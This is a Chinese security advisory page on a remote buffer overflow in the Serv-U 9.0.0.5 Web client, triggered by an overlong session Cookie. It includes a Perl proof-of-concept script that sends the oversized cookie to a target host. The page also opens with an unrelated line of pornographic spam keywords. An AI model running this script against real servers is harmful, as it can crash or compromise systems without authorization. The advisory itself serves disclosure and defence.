偷偷摘套内射激情视频,久久精品99国产国产精,中文字幕无线乱码人妻,中文在线中文a,性爽19p

Serv-U Web客戶端HTTP請求遠程溢出漏洞

安全 漏洞
遠程溢出##遠程攻擊##立即處理[msg]Serv-U Web客戶端HTTP請求遠程溢出漏洞 影響版本: RhinoSoft Serv-U 9.0.0.5漏洞描述: BUGTRAQ ID: 36895

Serv-U Web客戶端HTTP請求遠程溢出漏洞

影響版本:

RhinoSoft Serv-U 9.0.0.5

漏洞描述:

BUGTRAQ  ID: 36895

Serv-U FTP是一款FTP服務(wù)程序。

Serv-U產(chǎn)品捆綁有一個簡單的基于瀏覽器的傳輸客戶端,這個客戶端在處理超長的會話Cookie時存在緩沖區(qū)溢出漏洞。如果用戶受騙連接到了惡意服務(wù)器并向WebClient HTTP服務(wù)返回了超長的會話Cookie,就可能觸發(fā)這個溢出,導(dǎo)致在用戶機器上執(zhí)行任意指令。

---snip--- 
use IO::Socket; 

$|=1; 
$a = "A" x 100000; 
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => '80', 
                              Proto    => 'tcp');                             

print $sock "POST / HTTP/1.1\r\n" 
."Host: $ARGV[0]\r\n" 
."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_
d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb9507545814
06246bf8$a\r\n" 
."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n" 
."Content-Length: 0\r\n\r\n"; 

while (<$sock>) { 
    print; 
} 
---snip--- 

【編輯推薦】

  1. 利用MS08067遠程溢出漏洞抓肉雞
  2. Alt-N MDaemon IMAP Server CREATE命令遠程溢出漏洞
責(zé)任編輯:安泉 來源: 黑客防線
相關(guān)推薦

2021-07-13 12:44:43

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2011-12-13 11:08:00

2010-06-30 14:36:03

2010-06-30 14:32:53

Serv-UFTP服務(wù)器

2009-07-15 14:19:07

2024-10-16 08:51:57

2010-06-30 14:41:08

Serv-UFTP服務(wù)器

2014-07-17 15:47:52

2021-05-21 10:48:09

http語言開發(fā)

2025-03-14 09:20:46

2010-06-30 14:59:08

Serv-UFTP服務(wù)器

2010-06-30 14:55:56

Serv-UFTP服務(wù)器

2022-11-28 14:15:03

2021-08-22 14:52:00

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2013-06-08 09:59:15

VMwarevSphere Web

2009-02-27 13:16:00

2021-10-18 05:00:38

語言GoRequestHTTP

2020-03-24 15:15:29

HttpClientOkHttpJava

2011-06-08 14:30:54

SkypeWindows微軟

2021-11-15 06:00:14

JSPanda掃描漏洞
點贊
收藏

51CTO技術(shù)棧公眾號